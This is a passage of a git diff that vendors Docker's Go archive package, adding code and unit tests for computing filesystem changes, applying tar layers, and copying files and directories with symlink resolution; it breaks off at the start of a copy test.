+			t.Fatalf("no change for expected change %s\n", expectedChanges[i].String())
+		}
+		if changes[i].Path == expectedChanges[i].Path {
+			if changes[i] != expectedChanges[i] {
+				t.Fatalf("Wrong change for %s, expected %s, got %s\n", changes[i].Path, changes[i].String(), expectedChanges[i].String())
+			}
+		} else if changes[i].Path < expectedChanges[i].Path {
+			t.Fatalf("unexpected change %s\n", changes[i].String())
+		} else {
+			t.Fatalf("no change for expected change %s != %s\n", expectedChanges[i].String(), changes[i].String())
+		}
+	}
+}
+
+func TestApplyLayer(t *testing.T) {
+	// TODO Windows. There may be a way of running this, but turning off for now
+	// as createSampleDir uses symlinks.
+	// TODO Should work for Solaris
+	if runtime.GOOS == "windows" || runtime.GOOS == "solaris" {
+		t.Skip("symlinks on Windows; gcp failures on Solaris")
+	}
+	src, err := ioutil.TempDir("", "docker-changes-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	createSampleDir(t, src)
+	defer os.RemoveAll(src)
+	dst := src + "-copy"
+	if err := copyDir(src, dst); err != nil {
+		t.Fatal(err)
+	}
+	mutateSampleDir(t, dst)
+	defer os.RemoveAll(dst)
+
+	changes, err := ChangesDirs(dst, src)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	layer, err := ExportChanges(dst, changes, nil, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	layerCopy, err := NewTempArchive(layer, "")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := ApplyLayer(src, layerCopy); err != nil {
+		t.Fatal(err)
+	}
+
+	changes2, err := ChangesDirs(src, dst)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if len(changes2) != 0 {
+		t.Fatalf("Unexpected differences after reapplying mutation: %v", changes2)
+	}
+}
+
+func TestChangesSizeWithHardlinks(t *testing.T) {
+	// TODO Windows. There may be a way of running this, but turning off for now
+	// as createSampleDir uses symlinks.
+	if runtime.GOOS == "windows" {
+		t.Skip("hardlinks on Windows")
+	}
+	srcDir, err := ioutil.TempDir("", "docker-test-srcDir")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(srcDir)
+
+	destDir, err := ioutil.TempDir("", "docker-test-destDir")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(destDir)
+
+	creationSize, err := prepareUntarSourceDirectory(100, destDir, true)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	changes, err := ChangesDirs(destDir, srcDir)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	got := ChangesSize(destDir, changes)
+	if got != int64(creationSize) {
+		t.Errorf("Expected %d bytes of changes, got %d", creationSize, got)
+	}
+}
+
+func TestChangesSizeWithNoChanges(t *testing.T) {
+	size := ChangesSize("/tmp", nil)
+	if size != 0 {
+		t.Fatalf("ChangesSizes with no changes should be 0, was %d", size)
+	}
+}
+
+func TestChangesSizeWithOnlyDeleteChanges(t *testing.T) {
+	changes := []Change{
+		{Path: "deletedPath", Kind: ChangeDelete},
+	}
+	size := ChangesSize("/tmp", changes)
+	if size != 0 {
+		t.Fatalf("ChangesSizes with only delete changes should be 0, was %d", size)
+	}
+}
+
+func TestChangesSize(t *testing.T) {
+	parentPath, err := ioutil.TempDir("", "docker-changes-test")
+	defer os.RemoveAll(parentPath)
+	addition := path.Join(parentPath, "addition")
+	if err := ioutil.WriteFile(addition, []byte{0x01, 0x01, 0x01}, 0744); err != nil {
+		t.Fatal(err)
+	}
+	modification := path.Join(parentPath, "modification")
+	if err = ioutil.WriteFile(modification, []byte{0x01, 0x01, 0x01}, 0744); err != nil {
+		t.Fatal(err)
+	}
+	changes := []Change{
+		{Path: "addition", Kind: ChangeAdd},
+		{Path: "modification", Kind: ChangeModify},
+	}
+	size := ChangesSize(parentPath, changes)
+	if size != 6 {
+		t.Fatalf("Expected 6 bytes of changes, got %d", size)
+	}
+}
+
+func checkChanges(expectedChanges, changes []Change, t *testing.T) {
+	sort.Sort(changesByPath(expectedChanges))
+	sort.Sort(changesByPath(changes))
+	for i := 0; i < max(len(changes), len(expectedChanges)); i++ {
+		if i >= len(expectedChanges) {
+			t.Fatalf("unexpected change %s\n", changes[i].String())
+		}
+		if i >= len(changes) {
+			t.Fatalf("no change for expected change %s\n", expectedChanges[i].String())
+		}
+		if changes[i].Path == expectedChanges[i].Path {
+			if changes[i] != expectedChanges[i] {
+				t.Fatalf("Wrong change for %s, expected %s, got %s\n", changes[i].Path, changes[i].String(), expectedChanges[i].String())
+			}
+		} else if changes[i].Path < expectedChanges[i].Path {
+			t.Fatalf("unexpected change %s\n", changes[i].String())
+		} else {
+			t.Fatalf("no change for expected change %s != %s\n", expectedChanges[i].String(), changes[i].String())
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_unix.go b/vendor/github.com/docker/docker/pkg/archive/changes_unix.go
new file mode 100644
index 0000000000..3778b732cf
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/changes_unix.go
@@ -0,0 +1,36 @@
+// +build !windows
+
+package archive
+
+import (
+	"os"
+	"syscall"
+
+	"github.com/docker/docker/pkg/system"
+)
+
+func statDifferent(oldStat *system.StatT, newStat *system.StatT) bool {
+	// Don't look at size for dirs, its not a good measure of change
+	if oldStat.Mode() != newStat.Mode() ||
+		oldStat.UID() != newStat.UID() ||
+		oldStat.GID() != newStat.GID() ||
+		oldStat.Rdev() != newStat.Rdev() ||
+		// Don't look at size for dirs, its not a good measure of change
+		(oldStat.Mode()&syscall.S_IFDIR != syscall.S_IFDIR &&
+			(!sameFsTimeSpec(oldStat.Mtim(), newStat.Mtim()) || (oldStat.Size() != newStat.Size()))) {
+		return true
+	}
+	return false
+}
+
+func (info *FileInfo) isDir() bool {
+	return info.parent == nil || info.stat.Mode()&syscall.S_IFDIR != 0
+}
+
+func getIno(fi os.FileInfo) uint64 {
+	return uint64(fi.Sys().(*syscall.Stat_t).Ino)
+}
+
+func hasHardlinks(fi os.FileInfo) bool {
+	return fi.Sys().(*syscall.Stat_t).Nlink > 1
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_windows.go b/vendor/github.com/docker/docker/pkg/archive/changes_windows.go
new file mode 100644
index 0000000000..af94243fc4
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/changes_windows.go
@@ -0,0 +1,30 @@
+package archive
+
+import (
+	"os"
+
+	"github.com/docker/docker/pkg/system"
+)
+
+func statDifferent(oldStat *system.StatT, newStat *system.StatT) bool {
+
+	// Don't look at size for dirs, its not a good measure of change
+	if oldStat.ModTime() != newStat.ModTime() ||
+		oldStat.Mode() != newStat.Mode() ||
+		oldStat.Size() != newStat.Size() && !oldStat.IsDir() {
+		return true
+	}
+	return false
+}
+
+func (info *FileInfo) isDir() bool {
+	return info.parent == nil || info.stat.IsDir()
+}
+
+func getIno(fi os.FileInfo) (inode uint64) {
+	return
+}
+
+func hasHardlinks(fi os.FileInfo) bool {
+	return false
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/copy.go b/vendor/github.com/docker/docker/pkg/archive/copy.go
new file mode 100644
index 0000000000..0614c67cec
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/copy.go
@@ -0,0 +1,458 @@
+package archive
+
+import (
+	"archive/tar"
+	"errors"
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/pkg/system"
+)
+
+// Errors used or returned by this file.
+var (
+	ErrNotDirectory      = errors.New("not a directory")
+	ErrDirNotExists      = errors.New("no such directory")
+	ErrCannotCopyDir     = errors.New("cannot copy directory")
+	ErrInvalidCopySource = errors.New("invalid copy source content")
+)
+
+// PreserveTrailingDotOrSeparator returns the given cleaned path (after
+// processing using any utility functions from the path or filepath stdlib
+// packages) and appends a trailing `/.` or `/` if its corresponding  original
+// path (from before being processed by utility functions from the path or
+// filepath stdlib packages) ends with a trailing `/.` or `/`. If the cleaned
+// path already ends in a `.` path segment, then another is not added. If the
+// clean path already ends in a path separator, then another is not added.
+func PreserveTrailingDotOrSeparator(cleanedPath, originalPath string) string {
+	// Ensure paths are in platform semantics
+	cleanedPath = normalizePath(cleanedPath)
+	originalPath = normalizePath(originalPath)
+
+	if !specifiesCurrentDir(cleanedPath) && specifiesCurrentDir(originalPath) {
+		if !hasTrailingPathSeparator(cleanedPath) {
+			// Add a separator if it doesn't already end with one (a cleaned
+			// path would only end in a separator if it is the root).
+			cleanedPath += string(filepath.Separator)
+		}
+		cleanedPath += "."
+	}
+
+	if !hasTrailingPathSeparator(cleanedPath) && hasTrailingPathSeparator(originalPath) {
+		cleanedPath += string(filepath.Separator)
+	}
+
+	return cleanedPath
+}
+
+// assertsDirectory returns whether the given path is
+// asserted to be a directory, i.e., the path ends with
+// a trailing '/' or `/.`, assuming a path separator of `/`.
+func assertsDirectory(path string) bool {
+	return hasTrailingPathSeparator(path) || specifiesCurrentDir(path)
+}
+
+// hasTrailingPathSeparator returns whether the given
+// path ends with the system's path separator character.
+func hasTrailingPathSeparator(path string) bool {
+	return len(path) > 0 && os.IsPathSeparator(path[len(path)-1])
+}
+
+// specifiesCurrentDir returns whether the given path specifies
+// a "current directory", i.e., the last path segment is `.`.
+func specifiesCurrentDir(path string) bool {
+	return filepath.Base(path) == "."
+}
+
+// SplitPathDirEntry splits the given path between its directory name and its
+// basename by first cleaning the path but preserves a trailing "." if the
+// original path specified the current directory.
+func SplitPathDirEntry(path string) (dir, base string) {
+	cleanedPath := filepath.Clean(normalizePath(path))
+
+	if specifiesCurrentDir(path) {
+		cleanedPath += string(filepath.Separator) + "."
+	}
+
+	return filepath.Dir(cleanedPath), filepath.Base(cleanedPath)
+}
+
+// TarResource archives the resource described by the given CopyInfo to a Tar
+// archive. A non-nil error is returned if sourcePath does not exist or is
+// asserted to be a directory but exists as another type of file.
+//
+// This function acts as a convenient wrapper around TarWithOptions, which
+// requires a directory as the source path. TarResource accepts either a
+// directory or a file path and correctly sets the Tar options.
+func TarResource(sourceInfo CopyInfo) (content io.ReadCloser, err error) {
+	return TarResourceRebase(sourceInfo.Path, sourceInfo.RebaseName)
+}
+
+// TarResourceRebase is like TarResource but renames the first path element of
+// items in the resulting tar archive to match the given rebaseName if not "".
+func TarResourceRebase(sourcePath, rebaseName string) (content io.ReadCloser, err error) {
+	sourcePath = normalizePath(sourcePath)
+	if _, err = os.Lstat(sourcePath); err != nil {
+		// Catches the case where the source does not exist or is not a
+		// directory if asserted to be a directory, as this also causes an
+		// error.
+		return
+	}
+
+	// Separate the source path between its directory and
+	// the entry in that directory which we are archiving.
+	sourceDir, sourceBase := SplitPathDirEntry(sourcePath)
+
+	filter := []string{sourceBase}
+
+	logrus.Debugf("copying %q from %q", sourceBase, sourceDir)
+
+	return TarWithOptions(sourceDir, &TarOptions{
+		Compression:      Uncompressed,
+		IncludeFiles:     filter,
+		IncludeSourceDir: true,
+		RebaseNames: map[string]string{
+			sourceBase: rebaseName,
+		},
+	})
+}
+
+// CopyInfo holds basic info about the source
+// or destination path of a copy operation.
+type CopyInfo struct {
+	Path       string
+	Exists     bool
+	IsDir      bool
+	RebaseName string
+}
+
+// CopyInfoSourcePath stats the given path to create a CopyInfo
+// struct representing that resource for the source of an archive copy
+// operation. The given path should be an absolute local path. A source path
+// has all symlinks evaluated that appear before the last path separator ("/"
+// on Unix). As it is to be a copy source, the path must exist.
+func CopyInfoSourcePath(path string, followLink bool) (CopyInfo, error) {
+	// normalize the file path and then evaluate the symbol link
+	// we will use the target file instead of the symbol link if
+	// followLink is set
+	path = normalizePath(path)
+
+	resolvedPath, rebaseName, err := ResolveHostSourcePath(path, followLink)
+	if err != nil {
+		return CopyInfo{}, err
+	}
+
+	stat, err := os.Lstat(resolvedPath)
+	if err != nil {
+		return CopyInfo{}, err
+	}
+
+	return CopyInfo{
+		Path:       resolvedPath,
+		Exists:     true,
+		IsDir:      stat.IsDir(),
+		RebaseName: rebaseName,
+	}, nil
+}
+
+// CopyInfoDestinationPath stats the given path to create a CopyInfo
+// struct representing that resource for the destination of an archive copy
+// operation. The given path should be an absolute local path.
+func CopyInfoDestinationPath(path string) (info CopyInfo, err error) {
+	maxSymlinkIter := 10 // filepath.EvalSymlinks uses 255, but 10 already seems like a lot.
+	path = normalizePath(path)
+	originalPath := path
+
+	stat, err := os.Lstat(path)
+
+	if err == nil && stat.Mode()&os.ModeSymlink == 0 {
+		// The path exists and is not a symlink.
+		return CopyInfo{
+			Path:   path,
+			Exists: true,
+			IsDir:  stat.IsDir(),
+		}, nil
+	}
+
+	// While the path is a symlink.
+	for n := 0; err == nil && stat.Mode()&os.ModeSymlink != 0; n++ {
+		if n > maxSymlinkIter {
+			// Don't follow symlinks more than this arbitrary number of times.
+			return CopyInfo{}, errors.New("too many symlinks in " + originalPath)
+		}
+
+		// The path is a symbolic link. We need to evaluate it so that the
+		// destination of the copy operation is the link target and not the
+		// link itself. This is notably different than CopyInfoSourcePath which
+		// only evaluates symlinks before the last appearing path separator.
+		// Also note that it is okay if the last path element is a broken
+		// symlink as the copy operation should create the target.
+		var linkTarget string
+
+		linkTarget, err = os.Readlink(path)
+		if err != nil {
+			return CopyInfo{}, err
+		}
+
+		if !system.IsAbs(linkTarget) {
+			// Join with the parent directory.
+			dstParent, _ := SplitPathDirEntry(path)
+			linkTarget = filepath.Join(dstParent, linkTarget)
+		}
+
+		path = linkTarget
+		stat, err = os.Lstat(path)
+	}
+
+	if err != nil {
+		// It's okay if the destination path doesn't exist. We can still
+		// continue the copy operation if the parent directory exists.
+		if !os.IsNotExist(err) {
+			return CopyInfo{}, err
+		}
+
+		// Ensure destination parent dir exists.
+		dstParent, _ := SplitPathDirEntry(path)
+
+		parentDirStat, err := os.Lstat(dstParent)
+		if err != nil {
+			return CopyInfo{}, err
+		}
+		if !parentDirStat.IsDir() {
+			return CopyInfo{}, ErrNotDirectory
+		}
+
+		return CopyInfo{Path: path}, nil
+	}
+
+	// The path exists after resolving symlinks.
+	return CopyInfo{
+		Path:   path,
+		Exists: true,
+		IsDir:  stat.IsDir(),
+	}, nil
+}
+
+// PrepareArchiveCopy prepares the given srcContent archive, which should
+// contain the archived resource described by srcInfo, to the destination
+// described by dstInfo. Returns the possibly modified content archive along
+// with the path to the destination directory which it should be extracted to.
+func PrepareArchiveCopy(srcContent io.Reader, srcInfo, dstInfo CopyInfo) (dstDir string, content io.ReadCloser, err error) {
+	// Ensure in platform semantics
+	srcInfo.Path = normalizePath(srcInfo.Path)
+	dstInfo.Path = normalizePath(dstInfo.Path)
+
+	// Separate the destination path between its directory and base
+	// components in case the source archive contents need to be rebased.
+	dstDir, dstBase := SplitPathDirEntry(dstInfo.Path)
+	_, srcBase := SplitPathDirEntry(srcInfo.Path)
+
+	switch {
+	case dstInfo.Exists && dstInfo.IsDir:
+		// The destination exists as a directory. No alteration
+		// to srcContent is needed as its contents can be
+		// simply extracted to the destination directory.
+		return dstInfo.Path, ioutil.NopCloser(srcContent), nil
+	case dstInfo.Exists && srcInfo.IsDir:
+		// The destination exists as some type of file and the source
+		// content is a directory. This is an error condition since
+		// you cannot copy a directory to an existing file location.
+		return "", nil, ErrCannotCopyDir
+	case dstInfo.Exists:
+		// The destination exists as some type of file and the source content
+		// is also a file. The source content entry will have to be renamed to
+		// have a basename which matches the destination path's basename.
+		if len(srcInfo.RebaseName) != 0 {
+			srcBase = srcInfo.RebaseName
+		}
+		return dstDir, RebaseArchiveEntries(srcContent, srcBase, dstBase), nil
+	case srcInfo.IsDir:
+		// The destination does not exist and the source content is an archive
+		// of a directory. The archive should be extracted to the parent of
+		// the destination path instead, and when it is, the directory that is
+		// created as a result should take the name of the destination path.
+		// The source content entries will have to be renamed to have a
+		// basename which matches the destination path's basename.
+		if len(srcInfo.RebaseName) != 0 {
+			srcBase = srcInfo.RebaseName
+		}
+		return dstDir, RebaseArchiveEntries(srcContent, srcBase, dstBase), nil
+	case assertsDirectory(dstInfo.Path):
+		// The destination does not exist and is asserted to be created as a
+		// directory, but the source content is not a directory. This is an
+		// error condition since you cannot create a directory from a file
+		// source.
+		return "", nil, ErrDirNotExists
+	default:
+		// The last remaining case is when the destination does not exist, is
+		// not asserted to be a directory, and the source content is not an
+		// archive of a directory. It this case, the destination file will need
+		// to be created when the archive is extracted and the source content
+		// entry will have to be renamed to have a basename which matches the
+		// destination path's basename.
+		if len(srcInfo.RebaseName) != 0 {
+			srcBase = srcInfo.RebaseName
+		}
+		return dstDir, RebaseArchiveEntries(srcContent, srcBase, dstBase), nil
+	}
+
+}
+
+// RebaseArchiveEntries rewrites the given srcContent archive replacing
+// an occurrence of oldBase with newBase at the beginning of entry names.
+func RebaseArchiveEntries(srcContent io.Reader, oldBase, newBase string) io.ReadCloser {
+	if oldBase == string(os.PathSeparator) {
+		// If oldBase specifies the root directory, use an empty string as
+		// oldBase instead so that newBase doesn't replace the path separator
+		// that all paths will start with.
+		oldBase = ""
+	}
+
+	rebased, w := io.Pipe()
+
+	go func() {
+		srcTar := tar.NewReader(srcContent)
+		rebasedTar := tar.NewWriter(w)
+
+		for {
+			hdr, err := srcTar.Next()
+			if err == io.EOF {
+				// Signals end of archive.
+				rebasedTar.Close()
+				w.Close()
+				return
+			}
+			if err != nil {
+				w.CloseWithError(err)
+				return
+			}
+
+			hdr.Name = strings.Replace(hdr.Name, oldBase, newBase, 1)
+
+			if err = rebasedTar.WriteHeader(hdr); err != nil {
+				w.CloseWithError(err)
+				return
+			}
+
+			if _, err = io.Copy(rebasedTar, srcTar); err != nil {
+				w.CloseWithError(err)
+				return
+			}
+		}
+	}()
+
+	return rebased
+}
+
+// CopyResource performs an archive copy from the given source path to the
+// given destination path. The source path MUST exist and the destination
+// path's parent directory must exist.
+func CopyResource(srcPath, dstPath string, followLink bool) error {
+	var (
+		srcInfo CopyInfo
+		err     error
+	)
+
+	// Ensure in platform semantics
+	srcPath = normalizePath(srcPath)
+	dstPath = normalizePath(dstPath)
+
+	// Clean the source and destination paths.
+	srcPath = PreserveTrailingDotOrSeparator(filepath.Clean(srcPath), srcPath)
+	dstPath = PreserveTrailingDotOrSeparator(filepath.Clean(dstPath), dstPath)
+
+	if srcInfo, err = CopyInfoSourcePath(srcPath, followLink); err != nil {
+		return err
+	}
+
+	content, err := TarResource(srcInfo)
+	if err != nil {
+		return err
+	}
+	defer content.Close()
+
+	return CopyTo(content, srcInfo, dstPath)
+}
+
+// CopyTo handles extracting the given content whose
+// entries should be sourced from srcInfo to dstPath.
+func CopyTo(content io.Reader, srcInfo CopyInfo, dstPath string) error {
+	// The destination path need not exist, but CopyInfoDestinationPath will
+	// ensure that at least the parent directory exists.
+	dstInfo, err := CopyInfoDestinationPath(normalizePath(dstPath))
+	if err != nil {
+		return err
+	}
+
+	dstDir, copyArchive, err := PrepareArchiveCopy(content, srcInfo, dstInfo)
+	if err != nil {
+		return err
+	}
+	defer copyArchive.Close()
+
+	options := &TarOptions{
+		NoLchown:             true,
+		NoOverwriteDirNonDir: true,
+	}
+
+	return Untar(copyArchive, dstDir, options)
+}
+
+// ResolveHostSourcePath decides real path need to be copied with parameters such as
+// whether to follow symbol link or not, if followLink is true, resolvedPath will return
+// link target of any symbol link file, else it will only resolve symlink of directory
+// but return symbol link file itself without resolving.
+func ResolveHostSourcePath(path string, followLink bool) (resolvedPath, rebaseName string, err error) {
+	if followLink {
+		resolvedPath, err = filepath.EvalSymlinks(path)
+		if err != nil {
+			return
+		}
+
+		resolvedPath, rebaseName = GetRebaseName(path, resolvedPath)
+	} else {
+		dirPath, basePath := filepath.Split(path)
+
+		// if not follow symbol link, then resolve symbol link of parent dir
+		var resolvedDirPath string
+		resolvedDirPath, err = filepath.EvalSymlinks(dirPath)
+		if err != nil {
+			return
+		}
+		// resolvedDirPath will have been cleaned (no trailing path separators) so
+		// we can manually join it with the base path element.
+		resolvedPath = resolvedDirPath + string(filepath.Separator) + basePath
+		if hasTrailingPathSeparator(path) && filepath.Base(path) != filepath.Base(resolvedPath) {
+			rebaseName = filepath.Base(path)
+		}
+	}
+	return resolvedPath, rebaseName, nil
+}
+
+// GetRebaseName normalizes and compares path and resolvedPath,
+// return completed resolved path and rebased file name
+func GetRebaseName(path, resolvedPath string) (string, string) {
+	// linkTarget will have been cleaned (no trailing path separators and dot) so
+	// we can manually join it with them
+	var rebaseName string
+	if specifiesCurrentDir(path) && !specifiesCurrentDir(resolvedPath) {
+		resolvedPath += string(filepath.Separator) + "."
+	}
+
+	if hasTrailingPathSeparator(path) && !hasTrailingPathSeparator(resolvedPath) {
+		resolvedPath += string(filepath.Separator)
+	}
+
+	if filepath.Base(path) != filepath.Base(resolvedPath) {
+		// In the case where the path had a trailing separator and a symlink
+		// evaluation has changed the last path component, we will need to
+		// rebase the name in the archive that is being copied to match the
+		// originally requested name.
+		rebaseName = filepath.Base(path)
+	}
+	return resolvedPath, rebaseName
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/copy_unix.go b/vendor/github.com/docker/docker/pkg/archive/copy_unix.go
new file mode 100644
index 0000000000..e305b5e4af
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/copy_unix.go
@@ -0,0 +1,11 @@
+// +build !windows
+
+package archive
+
+import (
+	"path/filepath"
+)
+
+func normalizePath(path string) string {
+	return filepath.ToSlash(path)
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/copy_unix_test.go b/vendor/github.com/docker/docker/pkg/archive/copy_unix_test.go
new file mode 100644
index 0000000000..ecbfc172b0
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/copy_unix_test.go
@@ -0,0 +1,978 @@
+// +build !windows
+
+// TODO Windows: Some of these tests may be salvagable and portable to Windows.
+
+package archive
+
+import (
+	"bytes"
+	"crypto/sha256"
+	"encoding/hex"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+)
+
+func removeAllPaths(paths ...string) {
+	for _, path := range paths {
+		os.RemoveAll(path)
+	}
+}
+
+func getTestTempDirs(t *testing.T) (tmpDirA, tmpDirB string) {
+	var err error
+
+	if tmpDirA, err = ioutil.TempDir("", "archive-copy-test"); err != nil {
+		t.Fatal(err)
+	}
+
+	if tmpDirB, err = ioutil.TempDir("", "archive-copy-test"); err != nil {
+		t.Fatal(err)
+	}
+
+	return
+}
+
+func isNotDir(err error) bool {
+	return strings.Contains(err.Error(), "not a directory")
+}
+
+func joinTrailingSep(pathElements ...string) string {
+	joined := filepath.Join(pathElements...)
+
+	return fmt.Sprintf("%s%c", joined, filepath.Separator)
+}
+
+func fileContentsEqual(t *testing.T, filenameA, filenameB string) (err error) {
+	t.Logf("checking for equal file contents: %q and %q\n", filenameA, filenameB)
+
+	fileA, err := os.Open(filenameA)
+	if err != nil {
+		return
+	}
+	defer fileA.Close()
+
+	fileB, err := os.Open(filenameB)
+	if err != nil {
+		return
+	}
+	defer fileB.Close()
+
+	hasher := sha256.New()
+
+	if _, err = io.Copy(hasher, fileA); err != nil {
+		return
+	}
+
+	hashA := hasher.Sum(nil)
+	hasher.Reset()
+
+	if _, err = io.Copy(hasher, fileB); err != nil {
+		return
+	}
+
+	hashB := hasher.Sum(nil)
+
+	if !bytes.Equal(hashA, hashB) {
+		err = fmt.Errorf("file content hashes not equal - expected %s, got %s", hex.EncodeToString(hashA), hex.EncodeToString(hashB))
+	}
+
+	return
+}
+
+func dirContentsEqual(t *testing.T, newDir, oldDir string) (err error) {
+	t.Logf("checking for equal directory contents: %q and %q\n", newDir, oldDir)
+
+	var changes []Change
+
+	if changes, err = ChangesDirs(newDir, oldDir); err != nil {
+		return
+	}
+
+	if len(changes) != 0 {
+		err = fmt.Errorf("expected no changes between directories, but got: %v", changes)
+	}
+
+	return
+}
+
+func logDirContents(t *testing.T, dirPath string) {
+	logWalkedPaths := filepath.WalkFunc(func(path string, info os.FileInfo, err error) error {
+		if err != nil {
+			t.Errorf("stat error for path %q: %s", path, err)
+			return nil
+		}
+
+		if info.IsDir() {
+			path = joinTrailingSep(path)
+		}
+
+		t.Logf("\t%s", path)
+
+		return nil
+	})
+
+	t.Logf("logging directory contents: %q", dirPath)
+
+	if err := filepath.Walk(dirPath, logWalkedPaths); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func testCopyHelper(t *testing.T, srcPath, dstPath string) (err error) {
+	t.Logf("copying from %q to %q (not follow symbol link)", srcPath, dstPath)
+
+	return CopyResource(srcPath, dstPath, false)
+}
+
+func testCopyHelperFSym(t *testing.T, srcPath, dstPath string) (err error) {
+	t.Logf("copying from %q to %q (follow symbol link)", srcPath, dstPath)
+
+	return CopyResource(srcPath, dstPath, true)
+}
+
+// Basic assumptions about SRC and DST:
+// 1. SRC must exist.
+// 2. If SRC ends with a trailing separator, it must be a directory.
+// 3. DST parent directory must exist.
+// 4. If DST exists as a file, it must not end with a trailing separator.
+
+// First get these easy error cases out of the way.
+
+// Test for error when SRC does not exist.
+func TestCopyErrSrcNotExists(t *testing.T) {
+	tmpDirA, tmpDirB := getTestTempDirs(t)
+	defer removeAllPaths(tmpDirA, tmpDirB)
+
+	if _, err := CopyInfoSourcePath(filepath.Join(tmpDirA, "file1"), false); !os.IsNotExist(err) {
+		t.Fatalf("expected IsNotExist error, but got %T: %s", err, err)
+	}
+}
+
+// Test for error when SRC ends in a trailing
+// path separator but it exists as a file.
+func TestCopyErrSrcNotDir(t *testing.T) {
+	tmpDirA, tmpDirB := getTestTempDirs(t)
+	defer removeAllPaths(tmpDirA, tmpDirB)
+
+	// Load A with some sample files and directories.
+	createSampleDir(t, tmpDirA)
+
+	if _, err := CopyInfoSourcePath(joinTrailingSep(tmpDirA, "file1"), false); !isNotDir(err) {
+		t.Fatalf("expected IsNotDir error, but got %T: %s", err, err)
+	}
+}
+
+// Test for error when SRC is a valid file or directory,
+// but the DST parent directory does not exist.
+func TestCopyErrDstParentNotExists(t *testing.T) {
+	tmpDirA, tmpDirB := getTestTempDirs(t)
+	defer removeAllPaths(tmpDirA, tmpDirB)
+
+	// Load A with some sample files and directories.
+	createSampleDir(t, tmpDirA)
+
+	srcInfo := CopyInfo{Path: filepath.Join(tmpDirA, "file1"), Exists: true, IsDir: false}
+
+	// Try with a file source.
+	content, err := TarResource(srcInfo)
+	if err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+	defer content.Close()
+
+	// Copy to a file whose parent does not exist.
+	if err = CopyTo(content, srcInfo, filepath.Join(tmpDirB, "fakeParentDir", "file1")); err == nil {
+		t.Fatal("expected IsNotExist error, but got nil instead")
+	}
+
+	if !os.IsNotExist(err) {
+		t.Fatalf("expected IsNotExist error, but got %T: %s", err, err)
+	}
+
+	// Try with a directory source.
+	srcInfo = CopyInfo{Path: filepath.Join(tmpDirA, "dir1"), Exists: true, IsDir: true}
+
+	content, err = TarResource(srcInfo)
+	if err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+	defer content.Close()
+
+	// Copy to a directory whose parent does not exist.
+	if err = CopyTo(content, srcInfo, joinTrailingSep(tmpDirB, "fakeParentDir", "fakeDstDir")); err == nil {
+		t.Fatal("expected IsNotExist error, but got nil instead")
+	}
+
+	if !os.IsNotExist(err) {
+		t.Fatalf("expected IsNotExist error, but got %T: %s", err, err)
+	}
+}
+
+// Test for error when DST ends in a trailing
+// path separator but exists as a file.
+func TestCopyErrDstNotDir(t *testing.T) {
+	tmpDirA, tmpDirB := getTestTempDirs(t)
+	defer removeAllPaths(tmpDirA, tmpDirB)
+
+	// Load A and B with some sample files and directories.
+	createSampleDir(t, tmpDirA)
+	createSampleDir(t, tmpDirB)
+
+	// Try with a file source.
+	srcInfo := CopyInfo{Path: filepath.Join(tmpDirA, "file1"), Exists: true, IsDir: false}
+
+	content, err := TarResource(srcInfo)
+	if err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+	defer content.Close()
+
+	if err = CopyTo(content, srcInfo, joinTrailingSep(tmpDirB, "file1")); err == nil {
+		t.Fatal("expected IsNotDir error, but got nil instead")
+	}
+
+	if !isNotDir(err) {
+		t.Fatalf("expected IsNotDir error, but got %T: %s", err, err)
+	}
+
+	// Try with a directory source.
+	srcInfo = CopyInfo{Path: filepath.Join(tmpDirA, "dir1"), Exists: true, IsDir: true}
+
+	content, err = TarResource(srcInfo)
+	if err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+	defer content.Close()
+
+	if err = CopyTo(content, srcInfo, joinTrailingSep(tmpDirB, "file1")); err == nil {
+		t.Fatal("expected IsNotDir error, but got nil instead")
+	}
+
+	if !isNotDir(err) {
+		t.Fatalf("expected IsNotDir error, but got %T: %s", err, err)
+	}
+}
+
+// Possibilities are reduced to the remaining 10 cases:
+//
+//  case | srcIsDir | onlyDirContents | dstExists | dstIsDir | dstTrSep | action
+// ===================================================================================================
+//   A   |  no      |  -              |  no       |  -       |  no      |  create file
+//   B   |  no      |  -              |  no       |  -       |  yes     |  error
+//   C   |  no      |  -              |  yes      |  no      |  -       |  overwrite file
+//   D   |  no      |  -              |  yes      |  yes     |  -       |  create file in dst dir
+//   E   |  yes     |  no             |  no       |  -       |  -       |  create dir, copy contents
+//   F   |  yes     |  no             |  yes      |  no      |  -       |  error
+//   G   |  yes     |  no             |  yes      |  yes     |  -       |  copy dir and contents
+//   H   |  yes     |  yes            |  no       |  -       |  -       |  create dir, copy contents
+//   I   |  yes     |  yes            |  yes      |  no      |  -       |  error
+//   J   |  yes     |  yes            |  yes      |  yes     |  -       |  copy dir contents
+//
+
+// A. SRC specifies a file and DST (no trailing path separator) doesn't
+//    exist. This should create a file with the name DST and copy the
+//    contents of the source file into it.
+func TestCopyCaseA(t *testing.T) {
+	tmpDirA, tmpDirB := getTestTempDirs(t)
